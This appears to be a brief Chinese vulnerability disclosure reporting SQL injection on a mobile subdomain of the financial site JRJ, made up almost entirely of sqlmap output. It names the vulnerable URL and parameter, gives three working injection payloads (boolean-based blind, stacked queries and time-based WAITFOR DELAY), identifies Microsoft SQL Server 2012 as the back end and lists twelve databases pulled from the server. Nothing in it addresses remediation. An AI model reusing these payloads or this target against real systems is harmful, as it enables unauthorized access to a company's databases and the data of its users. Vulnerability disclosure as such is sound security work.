金融界某分站SQL注入下载

http://m.jrj.com.cn/stock/corpNews.jspa?_pn=2&code=002713

sqlmap identified the following injection points with a total of 0 HTTP(s) reque

sts:

---

Place: GET

Parameter: code

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: _pn=2&code=002713' AND 6159=6159 AND 'Bnag'='Bnag



Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: _pn=2&code=002713'; WAITFOR DELAY '0:0:5'--



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: _pn=2&code=002713' WAITFOR DELAY '0:0:5'--

---

[23:38:54] [INFO] the back-end DBMS is Microsoft SQL Server

web application technology: Nginx, JSP

back-end DBMS: Microsoft SQL Server 2012









available databases [12]:

[*] BJ_JRJCMS

[*] BJ_JRJCMS_History

[*] DataAnalyse

[*] Finance

[*] JRJ_3G

[*] master

[*] model

[*] msdb

[*] News2006_All

[*] Stock_Pro

[*] tempdb

[*] Trace